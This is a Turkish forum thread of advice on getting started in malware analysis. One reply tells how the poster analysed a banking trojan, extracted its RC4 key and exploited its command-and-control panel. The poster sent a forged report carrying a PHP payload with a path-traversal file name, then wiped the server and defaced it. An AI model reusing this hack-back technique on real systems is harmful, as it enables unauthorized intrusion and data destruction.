Zararlı Yazılım Analizi
-
j4x bunu yazdı
Yakın zamanda güzel bi sistem çıkacak bu işler için :) O zamana kadar az çok bilginiz varsa malwr.com u kullanabilirsiniz.
https://www.mertsarica.com/sunumlar/Anti_Analiz.pdf
şöyle bişey buldum mertsaricanın suunumlarında fakat nasıl yapıldığını açıklamamış bu işler nasil işliyor onu özetlemiş
bahsettiğin sistem nasıl bişey? remnux,kali linux,backtrack benzeri bişey mi? -
j4x bunu yazdı
Yakın zamanda güzel bi sistem çıkacak bu işler için :) O zamana kadar az çok bilginiz varsa malwr.com u kullanabilirsiniz.
sen gmgteam in eski admini misin hocam ?
-
aLman bunu yazdıTwitter bunu yazdı
Hocam çok iyi ollydbg,windbg gibi programları kullanıp assemblyden çakman lazım
Ayrıca mertsarica.com analizlerine bakabilirsin
packlenmiş programları unpack etmesi lazım önce. Peid vs :))
hocam bi online olda mesajlasalım.
bu bahsettiğinin interaktif eğitim setleri varmı? -
forumda bu konu hakkında bilgili kişilerin bulunduğunu umaraktan bir defa up
-
hocam yabancı kitapları ve makaleleri okuman lazım baslangıc yapmak istiyorsan.
he sadece cevap bekledigin sorular varsa da mert sarıca, ibrahim balic gibi ustalara mail atabilirsin. onlardan cevap alamazsan bana yaz, ben de bu isi yutup bütün cıkaran tasaklı bir abimize yönlendiririm sorularını.
reverse engineering, packers & unpackers, assembly, payload analizi gibi konu baslıklarını biliyor olmak lazım bu isle ilgilenmek icin.
-
Andrei bunu yazdı
hocam yabancı kitapları ve makaleleri okuman lazım baslangıc yapmak istiyorsan.
he sadece cevap bekledigin sorular varsa da mert sarıca, ibrahim balic gibi ustalara mail atabilirsin. onlardan cevap alamazsan bana yaz, ben de bu isi yutup bütün cıkaran tasaklı bir abimize yönlendiririm sorularını.
reverse engineering, packers & unpackers, assembly, payload analizi gibi konu baslıklarını biliyor olmak lazım bu isle ilgilenmek icin.
bu işi türkiyede yapan sayılı kişiler var sanırım... yukarıda ki attığım pdf mert sarica tarafından oluşturulmuş.
pdfi hazırlamasa içerisinde tavsiye ettiği kitabları göremeyektim
4 tane kitap ismi vermiş fakat işin içine ing giriyor hiç biri türkçe değil yarım yamalak bildiğim ing ilede olacak iş değil
türkçe kaynak sıkıntısı çok etkiliyor ben düşünmüştüm ki bu kitapların özetlerini türkçe olarak vermiş birisi çıkarda onlara bakıp öğrenirim demiştim
fakat öyle bir dünya yokmuş
sorularım 2 adet yukarıdada yazdım ilki basit bir dosyanın zararlı yazılım oldugunu düşündügünüzde ne yapıyosunuz? bir diğeri ise bir dosyanın içini görmek için neler gerekli ? ben yanlış hatırlamıyorsam bir youtube videosunda görmüştüm sanal pc ile zararlı yazılımı açıp vmware ile doldurup çalışan ramini .vnem olarak kaydediyordu daha sonrada remnux işletim sisteminde bu ramde ki hareketleri izliyordu okadarda teknik bilgiye gerek kalmıyordu bununla ilgili bir kaç döküman hiç fena olmazdı umarım bilgili birileri post atarda iyice öğrenmiş olurum :)
teşekkür ederim mesaj ve ilgin için. -
Valla haci ben eğitim materyali hazırlayacak olsam "otomatik zararlı analizi ve değerlendirme sistemlerini" dökümanın sonuna koyardım. Üstteki arkadaşların dediği gibi genel tersine mühendislik bilgisi şart aynı zamanda çok dallı budaklı bir konu. Kernel Data Structure'dan tut PE formatına kadar birçok genel bilgi gerektiriyor.
İkinci sorun için yüzeysel olarak başımdan geçen bir olayı aktarayım.
Holding'in birini siber espiyonaj tarzı "targeted-attack" sayılan bir zararlı saldırısı yapıldı. Holdingin avukatı tanıdık olduğu için bana böyle bir iş teklifinde bulundu. Analiz rapor + sonrası için önlemler için 20 bin lira teklif edildi. O ara çalışmadığım ve 20bin lira gibi bir tutar teklif edilmesi balıklama atlamama sebep oldu. Adamlar olaydan anlamadığı için benden istedikleri "kim bunlar amk bulabilir misin" gibi anlamsız isteklerle bulundular. Kim olduğunun önemi olmasa da moldovalı götverenin biri olduğunu aktardık. Neden kim olduğunun önemi yoktu? Çarptığı sensitive veri firmanın ağzına sıçacak türden veriydi. Sonuçta zararlı online bankacılığı hedef alan bir zararlıydı. Herneyse zararlının bulaştığı bir bilgisayarı kapıp başladık analize.Yüzelsel olarak nasıl'lara değinelim,
*Favori debuggerimiz ile 'Kernel Data Structure' analizi/denetlenmesi, +Zararlıyı 1:1 simule ederek işleyiş yapısının tespiti
*Favori paket/ağ dinleyicimiz ile zararlının ağ faliyetlerinin izlenmesi
*İletişim akışının izlenip, simule edilmesi
*Kontrol mekanizması olan bir zararlı ise kontrolü ele geçirilmesiGenel konu başlıkları altında gereksinimler,
-İşletim sistemleri
-Assembly dili
-İşletim sistemi güvenliğiBahsi geçen zararlının kontrolcüsüyle nasıl haberleştiğini öğrendik. Zararlı çalıştırıldığında sistemimize bulaştı, aynı zamanda bu zararlının bazı varyantları entegre rootkit ile geliyor. Öyle bir varyanta denk geldi isek işin içine rootkitler için girdiği için ek iş çıkıyor.. (Kernel debugging, Interception..)
Bankacılık faliyetlerini hedef alan bu zararlı, windows apileri, tarayıcıların paylaşılan kaynaklarını kanca yöntemi ile(hooking) http/https protokolü dahil bu apilerin kullanımda olduğu birçok protokoldeki veriyi araya kanca atmış olduğu için sahibine gönderebiliyor. Analimiz sırasında özel RC4 anahtarını bellekten çıkardık.
Sıra geldi komuta/kontrol panelinin ele geçirilmesine, genel olarak sunucu ve sunucudaki yazılımların zafiyetlerinden yararlanarakta bu işlemi deneyebilirdik fakat analizimiz sırasında zararlının sahibine nasıl rapor gönderdiğini, bu veriyi güvenli olarak sahibine göndermesi için RC4 şifreli olarak remote kaynağa transfer/post ettiğini öğrendik.
Not: Bu zararlının yeni sürümleri aes şifreleme kullanmakta exploiting yönteminde değişen birşey yok. Sadece zararlının içinden bu keyin çıkarılması biraz zorlaşıyor.
-------------------
function decode($data, $key) {
$td = mcrypt_module_open(MCRYPT_RIJNDAEL_128, '', MCRYPT_MODE_ECB, '');
$iv = mcrypt_create_iv(mcrypt_enc_get_iv_size($td), MCRYPT_RAND);
mcrypt_generic_init($td, $key, $iv);
mcrypt_generic($td, $data);
$data = mdecrypt_generic($td, $data);
mcrypt_generic_deinit($td);
mcrypt_module_close($td);
return $data;
}-------------------
Konuya dönelim,
Analizimizde gözümüze çarpan;
http://ADRES/gate.php > Zararlının çarptığı verileri göndediği adres
$RC4KEY = "~\o'tg!^$""}|y45v}?4Jw*>]D<8w>2h";------------------------------------
RC4 fonksiyonumuz:
function RC4($data, $key)
{
$hash = array();
$box = array();
$ret = '';
$key_length = strlen($key);
$data_length = strlen($data);
for($x = 0; $x < 256; $x++)
{
$hash[$x] = ord($key[$x % $key_length]);
$box[$x] = $x;
}
for($y = $x = 0; $x < 256; $x++)
{
$y = ($y + $box[$x] + $hash[$x]) % 256;
$tmp = $box[$x];
$box[$x] = $box[$y];
$box[$y] = $tmp;
}
for($z = $y = $x = 0; $x < $data_length; $x++)
{
$z = ($z + 1) % 256;
$y = ($y + $box[$z]) % 256;
$tmp = $box[$z];
$box[$z] = $box[$y];
$box[$y] = $tmp;
$k = $box[(($box[$z] + $box[$y]) % 256)];
$ret .= chr(ord($data[$x]) ^ $k);
}
return $ret;
}------------------------------------
Oturduk zararlıyı analiz ettik iyi güzel, bu bilgilere ulaştık oda iyi. Fakat nasıl ele geçireceğiz?
Gavurların dediği gibi işin işine biraz common sense girecek. Bu zararlının sahibiyle haberleşirken kullandığı güvenlik anahtarını kullanarak rapor yerine php backdoor göndermeyi deneyeceğiz.
Hemen botnetin sisteme gönderdiği stringi aradık, bulduk: "SBCID_BOTLOG_String"
Denemelere başladık:
$SBCID_BOTLOG_String = "<?php phpinfo(); ?>";
PHP kodumuzu hedef sisteme gönderdik fakat dizinde txt duruyor. Çözüm arıyoruz. Denemelere devam.
"DEST" adı geçen bir yönerge gözümüze çarptı. Hemen gönderdiğimiz post sorgusunda basit bir trick ekleyip denedik;
$SBCID_PATH_DEST_String = "..../..../..../..../haci.php."
Kodumuz çalıştı. Niuahahaha gülüşümüzü attık. Şeytan dürttü.
Lokalde araştırıp nelerin ele geçirildiğini raporlamak için scripti, veritabanını yedekleyip(şeytan doğru dur), sunucularına wipe çaktım, http sunucusununda ana sayfasına da bu videoyu ekleyip çıktım:
http://www.youtube.com/watch?v=uMu-wO1wwmI
Velhasıl hacı analiz yapabilmek için ingilizce seviyen yeterli düzeyde ise internetin yardımı ile temelden başlayıp yolunu bulursun. Kapsamlı kaynak bulmada zorluk çekiyorsan haber eyle yönlendirme de yardımcı olalım.
Aynı zamanda bu işleri her ne kadar hobi olarak yapsanda bir zaman sonra bu birikimi kazanca dönüştürmek gerekiyor.
Tek başına bu konular seni bayıyorsa bu aralar birçok mürid bilgi/bilişim güvenliğine ilgi duymaya başladı. Onlar ile koordineli olarak başlangıç yapabilirsiniz.
Umarım açıklayıcı olmuştur. -
ZINDIK bunu yazdı
Velhasıl hacı analiz yapabilmek için ingilizce seviyen yeterli düzeyde ise internetin yardımı ile temelden başlayıp yolunu bulursun. Kapsamlı kaynak bulmada zorluk çekiyorsan haber eyle yönlendirme de yardımcı olalım.
valla hoca üşenmeden okudum teşekkür ederim yazı için sardı baya :)
başlangıç olarak .pdf yada youtubede eğitim videosu atarsan fena olmaz sonuçta neyin neyle başlanacagını benden daha iyi biliyosundur -
diğer mesajların yararı oldu
bu işle ilgilenen başka muridl/murideler vardır umarım -
bir sefer up